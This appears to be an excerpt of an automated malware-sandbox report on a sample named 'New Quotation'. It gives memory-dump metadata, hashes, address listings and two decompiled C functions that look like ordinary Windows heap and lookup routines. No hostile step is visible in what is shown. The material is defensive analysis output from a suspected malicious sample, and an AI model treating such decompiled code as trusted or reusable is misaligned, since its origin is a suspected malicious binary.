                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865fa1
                                                                                                                                                                                          0x1d865fa1
                                                                                                                                                                                          0x1d865fa1
                                                                                                                                                                                          0x1d865fb8
                                                                                                                                                                                          0x1d865fbd
                                                                                                                                                                                          0x1d865fc2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865fc4
                                                                                                                                                                                          0x1d865fc7
                                                                                                                                                                                          0x1d865fc8
                                                                                                                                                                                          0x1d865fc9
                                                                                                                                                                                          0x1d865fcc
                                                                                                                                                                                          0x1d865fcf
                                                                                                                                                                                          0x1d865fd1
                                                                                                                                                                                          0x1d865fd8
                                                                                                                                                                                          0x1d865fe0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865ff0
                                                                                                                                                                                          0x1d865ff0
                                                                                                                                                                                          0x1d865ff7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865ff7
                                                                                                                                                                                          0x1d865f55
                                                                                                                                                                                          0x1d865f57
                                                                                                                                                                                          0x1d865f57
                                                                                                                                                                                          0x1d865f5a
                                                                                                                                                                                          0x1d865f63
                                                                                                                                                                                          0x1d865f67
                                                                                                                                                                                          0x1d865f6c
                                                                                                                                                                                          0x1d865f70
                                                                                                                                                                                          0x1d865f77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865f57
                                                                                                                                                                                          0x1d865f06
                                                                                                                                                                                          0x1d865f08
                                                                                                                                                                                          0x1d865f0f
                                                                                                                                                                                          0x1d865f13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865f19
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865f19
                                                                                                                                                                                          0x1d865ead
                                                                                                                                                                                          0x1d865eef
                                                                                                                                                                                          0x1d865ef5
                                                                                                                                                                                          0x1d865ef9
                                                                                                                                                                                          0x1d865ec0
                                                                                                                                                                                          0x1d865ec7
                                                                                                                                                                                          0x1d865ec8
                                                                                                                                                                                          0x1d865eca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865eca
                                                                                                                                                                                          0x1d865efb
                                                                                                                                                                                          0x1d865efe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865efe
                                                                                                                                                                                          0x1d865eaf
                                                                                                                                                                                          0x1d865eb4
                                                                                                                                                                                          0x1d865eba
                                                                                                                                                                                          0x1d865ebe
                                                                                                                                                                                          0x1d865ed2
                                                                                                                                                                                          0x1d865ed9
                                                                                                                                                                                          0x1d865edd
                                                                                                                                                                                          0x1d865edf
                                                                                                                                                                                          0x1d865ee0
                                                                                                                                                                                          0x1d865ee2
                                                                                                                                                                                          0x1d865ee4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865ee4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865e86
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d865e86
                                                                                                                                                                                          0x1d865e84
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 562ed78c3ea61e5e7e280defc00106698999a48cd42b6e6b92591680bdbed509
                                                                                                                                                                                          • Instruction ID: 8fba80cdf6d7ed960c8ed8e974fb5359ac7eb028bad9316b2a17eac7a73fd377
                                                                                                                                                                                          • Opcode Fuzzy Hash: 562ed78c3ea61e5e7e280defc00106698999a48cd42b6e6b92591680bdbed509
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E711036200741AFD722CF28C885F56B7A5EF44B74F1248A8E2569B6E0DB70F944CB72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D89C0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                          			E1D7D89C0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int* _t101;
				signed int _t102;
				intOrPtr _t103;
				intOrPtr _t106;
				signed int _t115;
				signed int _t120;
				signed int _t121;
				signed int _t123;
				signed int _t126;
				intOrPtr* _t127;
				void* _t129;
				signed int _t132;
				signed int _t133;
				signed int _t135;
				signed int _t136;
				intOrPtr _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				intOrPtr _t152;
				void* _t156;
				void* _t158;

				_push(0x20);
				_push(0x1d8abe50);
				E1D827BE4(__ebx, __edi, __esi);
				_t141 =  *(_t156 + 8);
				if(_t141 == 0) {
					_t97 = 0xc000000d;
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
					return _t97;
				}
				_t126 = 0;
				 *(_t156 - 0x20) = 0;
				_t152 = 0xc0000139;
				 *((intOrPtr*)(_t156 - 0x1c)) = 0xc0000139;
				E1D7D8CC4(_t129);
				E1D7DFED0(0x1d8c4f20);
				 *(_t156 - 4) =  *(_t156 - 4) & 0;
				_t132 =  *0x1d8c4f3c; // 0x0
				if(_t132 == 0) {
					L16:
					 *(_t156 - 4) = 0xfffffffe;
					E1D7D8AF4();
					_t97 = _t152;
					goto L17;
				}
				if(( *(_t156 + 0x14) & 0x00000e00) != 0) {
					_t101 =  *(_t156 + 0xc);
					if(_t101 != 0) {
						 *_t101 =  *_t101 & 0x00000000;
						_t143 = _t132;
						 *(_t156 - 0x24) = _t143;
						_t139 =  *0x1d8c4f38; // 0x194e3f8
						while(_t143 != 0) {
							if(( *(_t156 + 0x14) & 0x00000800) == 0) {
								if(( *(_t156 + 0x14) & 0x00000400) == 0) {
									L46:
									if(( *(_t156 + 0x14) & 0x00000200) == 0) {
										L48:
										_t143 = _t143 - 1;
										 *(_t156 - 0x24) = _t143;
										continue;
									}
									_t120 =  *(_t143 * 0x18 + _t139 - 0x18);
									if(_t120 ==  *(_t156 + 8)) {
										_t126 = _t120;
										L32:
										 *(_t156 - 0x20) = _t126;
										break;
									}
									goto L48;
								}
								_t121 = _t143 * 0x18;
								 *(_t156 - 0x28) = _t121;
								_t122 =  *((intOrPtr*)(_t121 + _t139 - 0x14));
								if( *((intOrPtr*)(_t121 + _t139 - 0x14)) == 0) {
									goto L46;
								}
								 *(_t156 - 4) = 1;
								_t123 = E1D8179A0(_t122,  *(_t156 + 8));
								if(_t123 != 0) {
									 *(_t156 - 4) =  *(_t156 - 4) & 0x00000000;
									_t139 =  *0x1d8c4f38; // 0x194e3f8
									goto L48;
								}
								_t139 =  *0x1d8c4f38; // 0x194e3f8
								_t126 =  *( *(_t156 - 0x28) + _t139 - 0x18);
								 *(_t156 - 0x20) = _t126;
								 *(_t156 - 4) =  *(_t156 - 4) & _t123;
								break;
							}
							_t136 = _t143 * 0x18;
							if( *((intOrPtr*)(_t136 + _t139 - 0xc)) !=  *(_t156 + 8)) {
								goto L48;
							}
							_t126 =  *(_t136 + _t139 - 0x18);
							goto L32;
						}
						if(_t126 != 0) {
							 *( *(_t156 + 0xc)) = _t126;
						}
						if(( *(_t156 + 0x14) & 0x00200000) == 0) {
							if(_t126 == 0) {
								L52:
								_t141 =  *(_t156 + 8);
								_t132 =  *0x1d8c4f3c; // 0x0
								L4:
								if(_t126 == 0) {
									_t126 = _t141;
									 *(_t156 - 0x20) = _t126;
								}
								_t144 = _t132;
								while(1) {
									 *(_t156 - 0x24) = _t144;
									if(_t144 == 0) {
										goto L16;
									}
									_t102 = _t144 * 0x18;
									 *(_t156 - 0x28) = _t102;
									if( *((intOrPtr*)(_t102 + _t139 - 0x18)) != _t126) {
										L15:
										_t144 = _t144 - 1;
										continue;
									}
									_t153 =  *(_t102 + _t139 - 0x14);
									if( *(_t102 + _t139 - 0x14) != 0) {
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
										_t139 =  *0x1d8c4f38; // 0x194e3f8
										_t102 =  *(_t156 - 0x28);
										 *(_t102 + _t139 - 0x14) =  *(_t102 + _t139 - 0x14) & 0x00000000;
										_t126 =  *(_t156 - 0x20);
										_t132 =  *0x1d8c4f3c; // 0x0
										_t144 =  *(_t156 - 0x24);
									}
									_t103 =  *((intOrPtr*)(_t102 + _t139 - 4));
									if(_t103 != 0) {
										if(_t103 != 0xffffffff) {
											E1D7D26A0(_t103, _t103);
											_t139 =  *0x1d8c4f38; // 0x194e3f8
											 *( *(_t156 - 0x28) + _t139 - 4) =  *( *(_t156 - 0x28) + _t139 - 4) & 0x00000000;
											_t132 =  *0x1d8c4f3c; // 0x0
										}
									}
									if(_t144 != _t132) {
										_t35 = _t139 - 0x18; // 0x194e3e0
										_t133 = 6;
										memcpy( *(_t156 - 0x28) + 0xffffffe8 + _t139, _t35 + _t132 * 0x18, _t133 << 2);
										_t158 = _t158 + 0xc;
										_t132 =  *0x1d8c4f3c; // 0x0
									}
									_t132 = _t132 - 1;
									 *0x1d8c4f3c = _t132;
									_t106 =  *0x1d8c4f04; // 0x20
									_t107 = _t106 + 0xffffffe0;
									if(_t132 < _t106 + 0xffffffe0) {
										_t139 = E1D7E2710( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t139, _t107 * 0x18);
										if(_t139 == 0) {
											_t152 = 0xc0000017;
											goto L25;
										}
										 *0x1d8c4f38 = _t139;
										 *0x1d8c4f04 =  *0x1d8c4f04 - 0x20;
										_t126 =  *(_t156 - 0x20);
										_t132 =  *0x1d8c4f3c; // 0x0
										goto L14;
									} else {
										L14:
										_t152 = 0;
										 *((intOrPtr*)(_t156 - 0x1c)) = 0;
										_t144 =  *(_t156 - 0x24);
										goto L15;
									}
								}
								goto L16;
							}
							_t115 = _t143 * 0x18;
							 *((intOrPtr*)(_t115 + _t139 - 8)) =  *((intOrPtr*)(_t115 + _t139 - 8)) - 1;
							if( *((intOrPtr*)(_t115 + _t139 - 8)) <= 0) {
								goto L52;
							}
							_t152 = 0xc0000708;
							goto L25;
						} else {
							if(_t126 == 0) {
								goto L16;
							}
							_t127 =  *((intOrPtr*)(_t156 + 0x10));
							if(_t127 == 0) {
								goto L16;
							}
							_t135 = _t143 * 0x18;
							 *_t127 =  *((intOrPtr*)(_t135 + _t139 - 0x10));
							if(( *(_t156 + 0x14) & 0x00040000) != 0) {
								 *((intOrPtr*)(_t135 + _t139 - 8)) =  *((intOrPtr*)(_t135 + _t139 - 8)) + 1;
							}
							_t152 = 0;
							L25:
							 *((intOrPtr*)(_t156 - 0x1c)) = _t152;
							goto L16;
						}
					}
					_t152 = 0xc000000d;
					goto L25;
				}
				_t139 =  *0x1d8c4f38; // 0x194e3f8
				goto L4;
			}


























                                                                                                                                                                                          0x1d7d89c0
                                                                                                                                                                                          0x1d7d89c2
                                                                                                                                                                                          0x1d7d89c7
                                                                                                                                                                                          0x1d7d89cc
                                                                                                                                                                                          0x1d7d89d1
                                                                                                                                                                                          0x1d832011
                                                                                                                                                                                          0x1d7d8aa4
                                                                                                                                                                                          0x1d7d8aa7
                                                                                                                                                                                          0x1d7d8ab3
                                                                                                                                                                                          0x1d7d8ab3
                                                                                                                                                                                          0x1d7d89d7
                                                                                                                                                                                          0x1d7d89d9
                                                                                                                                                                                          0x1d7d89dc
                                                                                                                                                                                          0x1d7d89e1
                                                                                                                                                                                          0x1d7d89e4
                                                                                                                                                                                          0x1d7d89ee
                                                                                                                                                                                          0x1d7d89f3
                                                                                                                                                                                          0x1d7d89f6
                                                                                                                                                                                          0x1d7d89fe
                                                                                                                                                                                          0x1d7d8a96
                                                                                                                                                                                          0x1d7d8a96
                                                                                                                                                                                          0x1d7d8a9d
                                                                                                                                                                                          0x1d7d8aa2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d8aa2
                                                                                                                                                                                          0x1d7d8a0b
                                                                                                                                                                                          0x1d83201b
                                                                                                                                                                                          0x1d832020
                                                                                                                                                                                          0x1d832036
                                                                                                                                                                                          0x1d832039
                                                                                                                                                                                          0x1d83203b
                                                                                                                                                                                          0x1d83203e
                                                                                                                                                                                          0x1d832044
                                                                                                                                                                                          0x1d83204f
                                                                                                                                                                                          0x1d8320b9
                                                                                                                                                                                          0x1d832123
                                                                                                                                                                                          0x1d83212a
                                                                                                                                                                                          0x1d83213c
                                                                                                                                                                                          0x1d83213c
                                                                                                                                                                                          0x1d83213d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83213d
                                                                                                                                                                                          0x1d83212f
                                                                                                                                                                                          0x1d832136
                                                                                                                                                                                          0x1d832067
                                                                                                                                                                                          0x1d832069
                                                                                                                                                                                          0x1d832069
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832069
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832136
                                                                                                                                                                                          0x1d8320bb
                                                                                                                                                                                          0x1d8320be
                                                                                                                                                                                          0x1d8320c1
                                                                                                                                                                                          0x1d8320c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8320c9
                                                                                                                                                                                          0x1d8320d4
                                                                                                                                                                                          0x1d8320dd
                                                                                                                                                                                          0x1d8320f7
                                                                                                                                                                                          0x1d8320fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8320fb
                                                                                                                                                                                          0x1d8320df
                                                                                                                                                                                          0x1d8320e8
                                                                                                                                                                                          0x1d8320ec
                                                                                                                                                                                          0x1d8320ef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8320ef
                                                                                                                                                                                          0x1d832051
                                                                                                                                                                                          0x1d83205b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832061
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832061
                                                                                                                                                                                          0x1d83206e
                                                                                                                                                                                          0x1d832073
                                                                                                                                                                                          0x1d832073
                                                                                                                                                                                          0x1d83207c
                                                                                                                                                                                          0x1d832147
                                                                                                                                                                                          0x1d832161
                                                                                                                                                                                          0x1d832161
                                                                                                                                                                                          0x1d832164
                                                                                                                                                                                          0x1d7d8a17
                                                                                                                                                                                          0x1d7d8a19
                                                                                                                                                                                          0x1d7d8a1b
                                                                                                                                                                                          0x1d7d8a1d
                                                                                                                                                                                          0x1d7d8a1d
                                                                                                                                                                                          0x1d7d8a20
                                                                                                                                                                                          0x1d7d8a22
                                                                                                                                                                                          0x1d7d8a22
                                                                                                                                                                                          0x1d7d8a27
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d8a29
                                                                                                                                                                                          0x1d7d8a2c
                                                                                                                                                                                          0x1d7d8a33
                                                                                                                                                                                          0x1d7d8a93
                                                                                                                                                                                          0x1d7d8a93
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d8a93
                                                                                                                                                                                          0x1d7d8a35
                                                                                                                                                                                          0x1d7d8a3b
                                                                                                                                                                                          0x1d7d8a49
                                                                                                                                                                                          0x1d7d8a4e
                                                                                                                                                                                          0x1d7d8a54
                                                                                                                                                                                          0x1d7d8a57
                                                                                                                                                                                          0x1d7d8a5c
                                                                                                                                                                                          0x1d7d8a5f
                                                                                                                                                                                          0x1d7d8a65
                                                                                                                                                                                          0x1d7d8a65
                                                                                                                                                                                          0x1d7d8a68
                                                                                                                                                                                          0x1d7d8a6e
                                                                                                                                                                                          0x1d7d8ab9
                                                                                                                                                                                          0x1d7d8abc
                                                                                                                                                                                          0x1d7d8ac1
                                                                                                                                                                                          0x1d7d8aca
                                                                                                                                                                                          0x1d7d8acf
                                                                                                                                                                                          0x1d7d8acf
                                                                                                                                                                                          0x1d7d8ab9
                                                                                                                                                                                          0x1d7d8a72
                                                                                                                                                                                          0x1d7d8ada
                                                                                                                                                                                          0x1d7d8ae9
                                                                                                                                                                                          0x1d7d8aea
                                                                                                                                                                                          0x1d7d8aea
                                                                                                                                                                                          0x1d7d8aec
                                                                                                                                                                                          0x1d7d8aec
                                                                                                                                                                                          0x1d7d8a74
                                                                                                                                                                                          0x1d7d8a75
                                                                                                                                                                                          0x1d7d8a7b
                                                                                                                                                                                          0x1d7d8a80
                                                                                                                                                                                          0x1d7d8a85
                                                                                                                                                                                          0x1d832184
                                                                                                                                                                                          0x1d832188
                                                                                                                                                                                          0x1d832029
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832029
                                                                                                                                                                                          0x1d83218e
                                                                                                                                                                                          0x1d832194
                                                                                                                                                                                          0x1d83219b
                                                                                                                                                                                          0x1d83219e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d8a8b
                                                                                                                                                                                          0x1d7d8a8b
                                                                                                                                                                                          0x1d7d8a8b
                                                                                                                                                                                          0x1d7d8a8d
                                                                                                                                                                                          0x1d7d8a90
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d8a90
                                                                                                                                                                                          0x1d7d8a85
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d8a22
                                                                                                                                                                                          0x1d832149
                                                                                                                                                                                          0x1d83214c
                                                                                                                                                                                          0x1d832155
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832157
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832082
                                                                                                                                                                                          0x1d832084
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83208a
                                                                                                                                                                                          0x1d83208f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832095
                                                                                                                                                                                          0x1d83209c
                                                                                                                                                                                          0x1d8320a5
                                                                                                                                                                                          0x1d8320a7
                                                                                                                                                                                          0x1d8320a7
                                                                                                                                                                                          0x1d8320ab
                                                                                                                                                                                          0x1d83202e
                                                                                                                                                                                          0x1d83202e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83202e
                                                                                                                                                                                          0x1d83207c
                                                                                                                                                                                          0x1d832022
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832022
                                                                                                                                                                                          0x1d7d8a11
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ce8d8be167b24db81f0adf93f0423ed34c25d9018bc38853a73c7ed44bfcfff9
                                                                                                                                                                                          • Instruction ID: 65027c354eef627d0c6173c9777788b81e8aae1d9640254f5f08ab01e980e504
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce8d8be167b24db81f0adf93f0423ed34c25d9018bc38853a73c7ed44bfcfff9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C816F31A14716DFCB15CF58C5D0BAD77B1FB88721F12412AE908AB291D778ED41CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CCEF0 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7CCEF0(void* __ecx, signed int* _a4, signed int _a8) {
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t123;
				signed int _t131;
				signed int* _t134;

				_t134 = _a4;
				_t131 = 0;
				if(_t134 == 0) {
					L70:
					_t131 = 0xc000000d;
					L15:
					return _t131;
				}
				_t123 = _a8;
				if(_t123 == 0) {
					goto L70;
				}
				if((_t123 & 0x00000400) != 0) {
					_t123 = 0xfff;
				}
				if((_t123 & 0x00000001) != 0) {
					if(_t134[5] != _t131) {
						if(( *_t134 & 0x00000001) != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[5]);
						}
						_t134[5] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffe;
				}
				if((_t123 & 0x00000002) != 0) {
					if(_t134[6] != _t131) {
						if(( *_t134 & 0x00000002) != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[6]);
						}
						_t134[6] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffd;
				}
				if((_t123 & 0x00000004) != 0) {
					if(_t134[7] != _t131) {
						if(( *_t134 & 0x00000004) != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[7]);
						}
						_t134[7] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffb;
				}
				if((_t123 & 0x00000008) != 0) {
					if(_t134[8] != _t131) {
						if(( *_t134 & 0x00000008) != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[8]);
						}
						_t134[8] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffff7;
				}
				if((_t123 & 0x00000010) != 0) {
					_t97 = _t134[9];
					if(_t97 != 0) {
						if(( *_t134 & 0x00000010) != 0) {
							 *(_t97 + 0x20) =  *(_t97 + 0x20) & 0xffffffbf;
							E1D7F332D(_t134[9]);
						}
						_t134[9] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffef;
				}
				if((_t123 & 0x00000020) != 0) {
					_t98 = _t134[0xa];
					if(_t98 != 0) {
						if(( *_t134 & 0x00000020) != 0) {
							 *(_t98 + 0x20) =  *(_t98 + 0x20) & 0xffffffbf;
							E1D7F332D(_t134[0xa]);
						}
						_t134[0xa] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffdf;
				}
				if((_t123 & 0x00000040) != 0) {
					_t99 = _t134[0xd];
					if(_t99 != 0) {
						if(( *_t134 & 0x00000040) != 0) {
							 *(_t99 + 0x20) =  *(_t99 + 0x20) & 0xffffffbf;
							E1D7F332D(_t134[0xd]);
						}
						_t134[0xd] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffbf;
				}
				if(_t123 < 0) {
					_t100 = _t134[0xc];
					if(_t100 != 0) {
						if(( *_t134 & 0x00000080) != 0) {
							 *(_t100 + 0x20) =  *(_t100 + 0x20) & 0xffffffbf;
							E1D7F332D(_t134[0xc]);
						}
						_t134[0xc] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffff7f;
				}
				_t125 = 0x200;
				if((0x00000200 & _t123) != 0) {
					_t101 = _t134[0xe];
					if(_t101 != 0) {
						if(( *_t134 & 0x00000200) != 0) {
							 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0xffffffbf;
							_t125 = _t134[0xe];
							E1D7F332D(_t134[0xe]);
						}
						_t134[0xe] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffdff;
				}
				if((0x00000800 & _t123) != 0) {
					if(_t134[0x14] != _t131) {
						if(( *_t134 & 0x00000800) != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[0x14]);
						}
						_t134[0x14] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffff7ff;
				}
				if((_t123 & 0x00000fff) != 0 && _t134[0xf] != _t131) {
					E1D7CCEF0(_t125, _t134[0xf], _t123);
					if(_t134[0xf] != _t131) {
						E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[0xf]);
					}
					_t134[0xf] = _t131;
				}
			}











                                                                                                                                                                                          0x1d7ccefb
                                                                                                                                                                                          0x1d7cceff
                                                                                                                                                                                          0x1d7ccf03
                                                                                                                                                                                          0x1d82a50a
                                                                                                                                                                                          0x1d82a50a
                                                                                                                                                                                          0x1d7ccf82
                                                                                                                                                                                          0x1d7ccf8a
                                                                                                                                                                                          0x1d7ccf8a
                                                                                                                                                                                          0x1d7ccf09
                                                                                                                                                                                          0x1d7ccf0e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ccf1a
                                                                                                                                                                                          0x1d82a3b7
                                                                                                                                                                                          0x1d82a3b7
                                                                                                                                                                                          0x1d7ccf23
                                                                                                                                                                                          0x1d7ccfcf
                                                                                                                                                                                          0x1d82a3c4
                                                                                                                                                                                          0x1d82a3d3
                                                                                                                                                                                          0x1d82a3d3
                                                                                                                                                                                          0x1d82a3d8
                                                                                                                                                                                          0x1d82a3d8
                                                                                                                                                                                          0x1d7ccfd5
                                                                                                                                                                                          0x1d7ccfd5
                                                                                                                                                                                          0x1d7ccf2c
                                                                                                                                                                                          0x1d7ccfe0
                                                                                                                                                                                          0x1d82a3e3
                                                                                                                                                                                          0x1d82a3f2
                                                                                                                                                                                          0x1d82a3f2
                                                                                                                                                                                          0x1d82a3f7
                                                                                                                                                                                          0x1d82a3f7
                                                                                                                                                                                          0x1d7ccfe6
                                                                                                                                                                                          0x1d7ccfe6
                                                                                                                                                                                          0x1d7ccf35
                                                                                                                                                                                          0x1d7ccf90
                                                                                                                                                                                          0x1d82a402
                                                                                                                                                                                          0x1d82a411
                                                                                                                                                                                          0x1d82a411
                                                                                                                                                                                          0x1d82a416
                                                                                                                                                                                          0x1d82a416
                                                                                                                                                                                          0x1d7ccf96
                                                                                                                                                                                          0x1d7ccf96
                                                                                                                                                                                          0x1d7ccf3a
                                                                                                                                                                                          0x1d7ccf9e
                                                                                                                                                                                          0x1d82a421
                                                                                                                                                                                          0x1d82a430
                                                                                                                                                                                          0x1d82a430
                                                                                                                                                                                          0x1d82a435
                                                                                                                                                                                          0x1d82a435
                                                                                                                                                                                          0x1d7ccfa4
                                                                                                                                                                                          0x1d7ccfa4
                                                                                                                                                                                          0x1d7ccf3f
                                                                                                                                                                                          0x1d7ccfa9
                                                                                                                                                                                          0x1d7ccfae
                                                                                                                                                                                          0x1d82a440
                                                                                                                                                                                          0x1d82a442
                                                                                                                                                                                          0x1d82a449
                                                                                                                                                                                          0x1d82a449
                                                                                                                                                                                          0x1d82a44e
                                                                                                                                                                                          0x1d82a44e
                                                                                                                                                                                          0x1d7ccfb4
                                                                                                                                                                                          0x1d7ccfb4
                                                                                                                                                                                          0x1d7ccf44
                                                                                                                                                                                          0x1d7ccfb9
                                                                                                                                                                                          0x1d7ccfbe
                                                                                                                                                                                          0x1d82a459
                                                                                                                                                                                          0x1d82a45b
                                                                                                                                                                                          0x1d82a462
                                                                                                                                                                                          0x1d82a462
                                                                                                                                                                                          0x1d82a467
                                                                                                                                                                                          0x1d82a467
                                                                                                                                                                                          0x1d7ccfc4
                                                                                                                                                                                          0x1d7ccfc4
                                                                                                                                                                                          0x1d7ccf49
                                                                                                                                                                                          0x1d7ccfee
                                                                                                                                                                                          0x1d7ccff3
                                                                                                                                                                                          0x1d82a472
                                                                                                                                                                                          0x1d82a474
                                                                                                                                                                                          0x1d82a47b
                                                                                                                                                                                          0x1d82a47b
                                                                                                                                                                                          0x1d82a480
                                                                                                                                                                                          0x1d82a480
                                                                                                                                                                                          0x1d7ccff9
                                                                                                                                                                                          0x1d7ccff9
                                                                                                                                                                                          0x1d7ccf51
                                                                                                                                                                                          0x1d7cd001
                                                                                                                                                                                          0x1d7cd006
                                                                                                                                                                                          0x1d82a48b
                                                                                                                                                                                          0x1d82a48d
                                                                                                                                                                                          0x1d82a494
                                                                                                                                                                                          0x1d82a494
                                                                                                                                                                                          0x1d82a499
                                                                                                                                                                                          0x1d82a499
                                                                                                                                                                                          0x1d7cd00c
                                                                                                                                                                                          0x1d7cd00c
                                                                                                                                                                                          0x1d7ccf57
                                                                                                                                                                                          0x1d7ccf5e
                                                                                                                                                                                          0x1d7cd017
                                                                                                                                                                                          0x1d7cd01c
                                                                                                                                                                                          0x1d82a4a3
                                                                                                                                                                                          0x1d82a4a5
                                                                                                                                                                                          0x1d82a4a9
                                                                                                                                                                                          0x1d82a4ac
                                                                                                                                                                                          0x1d82a4ac
                                                                                                                                                                                          0x1d82a4b1
                                                                                                                                                                                          0x1d82a4b1
                                                                                                                                                                                          0x1d7cd022
                                                                                                                                                                                          0x1d7cd022
                                                                                                                                                                                          0x1d7ccf6b
                                                                                                                                                                                          0x1d82a4bc
                                                                                                                                                                                          0x1d82a4c0
                                                                                                                                                                                          0x1d82a4cf
                                                                                                                                                                                          0x1d82a4cf
                                                                                                                                                                                          0x1d82a4d4
